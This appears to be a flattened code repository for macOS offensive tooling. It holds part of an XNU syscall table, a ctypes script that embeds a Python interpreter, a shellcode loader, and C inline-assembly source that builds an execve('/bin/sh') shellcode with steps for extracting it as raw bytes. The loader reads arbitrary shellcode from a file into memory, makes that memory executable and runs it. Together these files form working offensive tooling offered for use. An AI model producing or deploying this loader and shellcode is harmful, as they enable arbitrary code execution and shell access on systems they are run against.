ALL { int __mac_get_pid(pid_t pid, struct mac *mac_p); } 585 | 391 AUE_MAC_GET_LCID ALL { int __mac_get_lcid(pid_t lcid, struct mac *mac_p); } 586 | 392 AUE_MAC_GET_LCTX ALL { int __mac_get_lctx(struct mac *mac_p); } 587 | 393 AUE_MAC_SET_LCTX ALL { int __mac_set_lctx(struct mac *mac_p); } 588 | 394 AUE_SETLCID ALL { int setlcid(pid_t pid, pid_t lcid) NO_SYSCALL_STUB; } 589 | 395 AUE_GETLCID ALL { int getlcid(pid_t pid) NO_SYSCALL_STUB; } 590 | 396 AUE_NULL ALL { user_ssize_t read_nocancel(int fd, user_addr_t cbuf, user_size_t nbyte) NO_SYSCALL_STUB; } 591 | 397 AUE_NULL ALL { user_ssize_t write_nocancel(int fd, user_addr_t cbuf, user_size_t nbyte) NO_SYSCALL_STUB; } 592 | 398 AUE_OPEN_RWTC ALL { int open_nocancel(user_addr_t path, int flags, int mode) NO_SYSCALL_STUB; } 593 | 399 AUE_CLOSE ALL { int close_nocancel(int fd) NO_SYSCALL_STUB; } 594 | 400 AUE_WAIT4 ALL { int wait4_nocancel(int pid, user_addr_t status, int options, user_addr_t rusage) NO_SYSCALL_STUB; } 595 | #if SOCKETS 596 | 401 AUE_RECVMSG ALL { int recvmsg_nocancel(int s, struct msghdr *msg, int flags) NO_SYSCALL_STUB; } 597 | 402 AUE_SENDMSG ALL { int sendmsg_nocancel(int s, caddr_t msg, int flags) NO_SYSCALL_STUB; } 598 | 403 AUE_RECVFROM ALL { int recvfrom_nocancel(int s, void *buf, size_t len, int flags, struct sockaddr *from, int *fromlenaddr) NO_SYSCALL_STUB; } 599 | 404 AUE_ACCEPT ALL { int accept_nocancel(int s, caddr_t name, socklen_t *anamelen) NO_SYSCALL_STUB; } 600 | #else 601 | 401 AUE_NULL ALL { int nosys(void); } 602 | 402 AUE_NULL ALL { int nosys(void); } 603 | 403 AUE_NULL ALL { int nosys(void); } 604 | 404 AUE_NULL ALL { int nosys(void); } 605 | #endif /* SOCKETS */ 606 | 405 AUE_MSYNC ALL { int msync_nocancel(caddr_t addr, size_t len, int flags) NO_SYSCALL_STUB; } 607 | 406 AUE_FCNTL ALL { int fcntl_nocancel(int fd, int cmd, long arg) NO_SYSCALL_STUB; } 608 | 407 AUE_SELECT ALL { int select_nocancel(int nd, u_int32_t *in, u_int32_t *ou, u_int32_t *ex, struct timeval *tv) NO_SYSCALL_STUB; } 609 | 408 AUE_FSYNC ALL { int fsync_nocancel(int fd) NO_SYSCALL_STUB; } 610 | #if SOCKETS 611 | 409 AUE_CONNECT ALL { int connect_nocancel(int s, caddr_t name, socklen_t namelen) NO_SYSCALL_STUB; } 612 | #else 613 | 409 AUE_NULL ALL { int nosys(void); } 614 | #endif /* SOCKETS */ 615 | 410 AUE_NULL ALL { int sigsuspend_nocancel(sigset_t mask) NO_SYSCALL_STUB; } 616 | 411 AUE_READV ALL { user_ssize_t readv_nocancel(int fd, struct iovec *iovp, u_int iovcnt) NO_SYSCALL_STUB; } 617 | 412 AUE_WRITEV ALL { user_ssize_t writev_nocancel(int fd, struct iovec *iovp, u_int iovcnt) NO_SYSCALL_STUB; } 618 | #if SOCKETS 619 | 413 AUE_SENDTO ALL { int sendto_nocancel(int s, caddr_t buf, size_t len, int flags, caddr_t to, socklen_t tolen) NO_SYSCALL_STUB; } 620 | #else 621 | 413 AUE_NULL ALL { int nosys(void); } 622 | #endif /* SOCKETS */ 623 | 414 AUE_PREAD ALL { user_ssize_t pread_nocancel(int fd, user_addr_t buf, user_size_t nbyte, off_t offset) NO_SYSCALL_STUB; } 624 | 415 AUE_PWRITE ALL { user_ssize_t pwrite_nocancel(int fd, user_addr_t buf, user_size_t nbyte, off_t offset) NO_SYSCALL_STUB; } 625 | 416 AUE_WAITID ALL { int waitid_nocancel(idtype_t idtype, id_t id, siginfo_t *infop, int options) NO_SYSCALL_STUB; } 626 | 417 AUE_POLL ALL { int poll_nocancel(struct pollfd *fds, u_int nfds, int timeout) NO_SYSCALL_STUB; } 627 | #if SYSV_MSG 628 | 418 AUE_MSGSND ALL { int msgsnd_nocancel(int msqid, void *msgp, size_t msgsz, int msgflg) NO_SYSCALL_STUB; } 629 | 419 AUE_MSGRCV ALL { user_ssize_t msgrcv_nocancel(int msqid, void *msgp, size_t msgsz, long msgtyp, int msgflg) NO_SYSCALL_STUB; } 630 | #else 631 | 418 AUE_NULL ALL { int nosys(void); } 632 | 419 AUE_NULL ALL { int nosys(void); } 633 | #endif 634 | 420 AUE_SEMWAIT ALL { int sem_wait_nocancel(sem_t *sem) NO_SYSCALL_STUB; } 635 | 421 AUE_NULL ALL { int aio_suspend_nocancel(user_addr_t aiocblist, int nent, user_addr_t timeoutp) NO_SYSCALL_STUB; } 636 | 422 AUE_SIGWAIT ALL { int __sigwait_nocancel(user_addr_t set, user_addr_t sig) NO_SYSCALL_STUB; } 637 | ;#if OLD_SEMWAIT_SIGNAL 638 | ;423 AUE_NULL ALL { int nosys(void); } { old __semwait_signal_nocancel } 639 | ;#else 640 | 423 AUE_SEMWAITSIGNAL ALL { int __semwait_signal_nocancel(int cond_sem, int mutex_sem, int timeout, int relative, int64_t tv_sec, int32_t tv_nsec) NO_SYSCALL_STUB;} 641 | ;#endif 642 | 424 AUE_MAC_MOUNT ALL { int __mac_mount(char *type, char *path, int flags, caddr_t data, struct mac *mac_p); } 643 | 425 AUE_MAC_GET_MOUNT ALL { int __mac_get_mount(char *path, struct mac *mac_p); } 644 | 426 AUE_MAC_GETFSSTAT ALL { int __mac_getfsstat(user_addr_t buf, int bufsize, user_addr_t mac, int macsize, int flags); } 645 | 427 AUE_FSGETPATH ALL { user_ssize_t fsgetpath(user_addr_t buf, size_t bufsize, user_addr_t fsid, uint64_t objid) NO_SYSCALL_STUB; } { private fsgetpath (File Manager SPI) } 646 | 428 AUE_NULL ALL { mach_port_name_t audit_session_self(void); } 647 | 429 AUE_NULL ALL { int audit_session_join(mach_port_name_t port); } -------------------------------------------------------------------------------- /loader/contained-py.py: -------------------------------------------------------------------------------- 1 | import ctypes 2 | import threading 3 | import sys 4 | import os 5 | import errno 6 | 7 | 8 | 9 | 10 | def execute(): 11 | ''' 12 | threaded function for execution in seprate thread context. 13 | TODO: test memeory for memeory leaks with Py_Initialize() 14 | ''' 15 | OSX_PY_DYLIB27 = '/usr/lib/libpython2.7.dylib' 16 | OSX_PY_DYLIB26 = '/usr/lib/libpython2.6.dylib' 17 | PROGRAM_NAME = 'load-test' 18 | SIMPLE_STRING = "print 'Hi from the python matrix!'\n" 19 | PY_HOME = '/usr/lib/python2.6/' 20 | 21 | print "-------------------------------------------" 22 | libpy27 = ctypes.CDLL(OSX_PY_DYLIB27, use_errno=True) 23 | if not libpy27: 24 | print "Error loading C libary: %s" % errno.errorcode[ctypes.get_errno()] 25 | print "* C runtime libary loaded: %s" % OSX_PY_DYLIB27 26 | print "* C runtime handle at: %s" % libpy27 27 | 28 | libpy26 = ctypes.CDLL(OSX_PY_DYLIB26, use_errno=True) 29 | if not libpy26: 30 | print "Error loading C libary: %s" % errno.errorcode[ctypes.get_errno()] 31 | print "* C runtime libary loaded: %s" % OSX_PY_DYLIB26 32 | print "* C runtime handle at: %s" % libpy26 33 | 34 | 35 | if (libpy26.Py_SetProgramName(PROGRAM_NAME) == 0): 36 | print "* Python program name set to: %s" % PROGRAM_NAME 37 | if (libpy26.Py_SetPythonHome(PY_HOME) == 0): 38 | print "* Python home set to: %s" % PY_HOME 39 | 40 | libpy26.Py_Initialize() 41 | if (libpy26.Py_IsInitialized() == 0): 42 | print "* Python interpreter failed to initialize.." 43 | exit() 44 | else: 45 | print "* Python interpreter successfully initialized!" 46 | 47 | print "* attempting to run python simple string" 48 | print "-------------------------------------------" 49 | libpy26.PyRun_SimpleString(SIMPLE_STRING) 50 | 51 | print "-------------------------------------------" 52 | print "* Python interpreter being finalized" 53 | libpy26.Py_Finalize() 54 | exit() 55 | 56 | 57 | if __name__ == "__main__": 58 | print "-------------------------------------------" 59 | print "* Spawning Py thread for thread context" 60 | t = threading.Thread(target=execute,) 61 | print "* Thread object starting %s" % t 62 | t.start() 63 | -------------------------------------------------------------------------------- /loader/loader.py: -------------------------------------------------------------------------------- 1 | import ctypes 2 | import sys 3 | import os 4 | import errno 5 | 6 | # mmap/mprotect header defs 7 | PROT_READ = 0x01 8 | PROT_WRITE = 0x02 9 | MAP_ANON = 0x1000 10 | MAP_PRIVATE = 0x0002 11 | PROT_EXEC = 0x04 12 | 13 | # static vars 14 | NULL = 0 15 | OSX_LIBC_DYLIB = '/usr/lib/libSystem.B.dylib' 16 | 17 | if (len(sys.argv) != 2) : 18 | print "\nExample: python loader.py shellcode_file.sc\n" 19 | exit() 20 | 21 | print "-------------------------------------------" 22 | libc = ctypes.CDLL(OSX_LIBC_DYLIB, use_errno=True) 23 | libc.restype = ctypes.c_void_p 24 | if not libc: 25 | print "Error loading C libary: %s" % errno.errorcode[ctypes.get_errno()] 26 | print "* C runtime libary loaded: %s" % OSX_LIBC_DYLIB 27 | 28 | page_size = libc.getpagesize() 29 | print "* Current page size: %s" % page_size 30 | 31 | # set return type to pointer object 32 | mmap = libc.mmap 33 | mmap.restype = ctypes.POINTER(ctypes.c_int) 34 | shellcode_buf_pointer = libc.mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); 35 | print "* Shellcode buffer pointer: %s" % shellcode_buf_pointer 36 | if (shellcode_buf_pointer == -1): 37 | print "Error building shellcode buffer: %s" % errno.errorcode[ctypes.get_errno()] 38 | 39 | file_size = os.path.getsize(sys.argv[1]) 40 | print "* Shellcode file size: %s" % file_size 41 | 42 | # set return type to pointer object 43 | fopen = libc.fopen 44 | fopen.restype = ctypes.POINTER(ctypes.c_int) 45 | print "* Shellcode file pointer: %s" % shellcode_buf_pointer 46 | file_handle = libc.fopen(sys.argv[1], "r"); 47 | return_val = libc.fread(shellcode_buf_pointer, file_size, 1, file_handle) 48 | if return_val != 1: 49 | print "Error moving shellcode file into buffer: %s" % errno.errorcode[ctypes.get_errno()] 50 | 51 | print "-------------------------------------------" 52 | if (libc.mprotect(shellcode_buf_pointer, page_size, PROT_READ | PROT_EXEC) != 0): 53 | print "Error RX buffer: %s" % errno.errorcode[ctypes.get_errno()] 54 | print "- Shellcode buffer now RX memory" 55 | print "- Casting pointer to: %s " % shellcode_buf_pointer 56 | print "- Executing shellcode" 57 | # ((void (*)())shellcode_buf_pointer)(); 58 | try: 59 | shell = ctypes.cast(shellcode_buf_pointer, ctypes.CFUNCTYPE(ctypes.c_void_p)) 60 | shell() 61 | except: 62 | print "Shellcode done...." 63 | 64 | #libc.fclose(sys.argv[1]) 65 | 66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /shellcode/system-execve-order-file.txt: -------------------------------------------------------------------------------- 1 | _main1 2 | -------------------------------------------------------------------------------- /shellcode/system-execve-shell.c: -------------------------------------------------------------------------------- 1 | //#include 2 | 3 | 4 | /* 5 | 1) compile code: 6 | /usr/local/Cellar/gcc/6.3.0_1/bin/gcc-6 -c test.c --shared -fpic -static -O0 -fno-asynchronous-unwind-tables -D LIB 7 | 8 | or for byte savings: (86 bytes) 9 | 10 | /usr/local/Cellar/gcc/6.3.0_1/bin/gcc-6 -c test.c --shared -fpic -static -O3 -fno-asynchronous-unwind-tables -D LIB 11 | 12 | 2) link your code: 13 | ld test.o -o test -S -static -dylib -order_file system-execve-order-file.txt 14 | 15 | 2) get hex of shel code of section: 16 | gobjcopy -O binary --only-section=.text test test.output 17 | */ 18 | 19 | // int main1(); 20 | 21 | // int myexec(char* arg1, long arg2, long arg3); 22 | 23 | static volatile int myexec(char * arg1, long arg2, long arg3) { 24 | /* 25 | asm ( assembler template 26 | : output operands 27 | : input operands 28 | : list of clobbered registers 29 | ); 30 | // */ 31 | // int a=10, b; 32 | // asm ("movl %1, %%eax; 33 | // movl %%eax, %0;" 34 | // :"=r"(b) /* output */ 35 | // :"r"(a) /* input */ 36 | // :"%eax" /* clobbered register */ 37 | // ); 38 | volatile int x = 0; 39 | int y = 0x200003b; 40 | asm volatile( "movq %4,%%rax;\n\t" 41 | "movq %1,%%rdi;\n\t" 42 | "mov %2,%%rsi;\n\t" 43 | "mov %3,%%rdx;\n\t" 44 | "syscall" 45 | :"=g"(x) 46 | :"g"(arg1),"g"(arg2),"g"(arg3),"g"(y) 47 | :"%rcx", "%r11", "%rax", "%rdi", "%rsi", "%rdx" 48 | ); 49 | return x; 50 | 51 | } 52 | 53 | int main1() { 54 | char mystring[] = {'/','b','i','n','/','s','h',0}; 55 | //seteuid(0); 56 | //fork(); 57 | // char* command="/bin/sh" 58 | myexec(mystring, 0, 0); 59 | return 0; 60 | } 61 | 62 | 63 | 64 | 65 | --------------------------------------------------------------------------------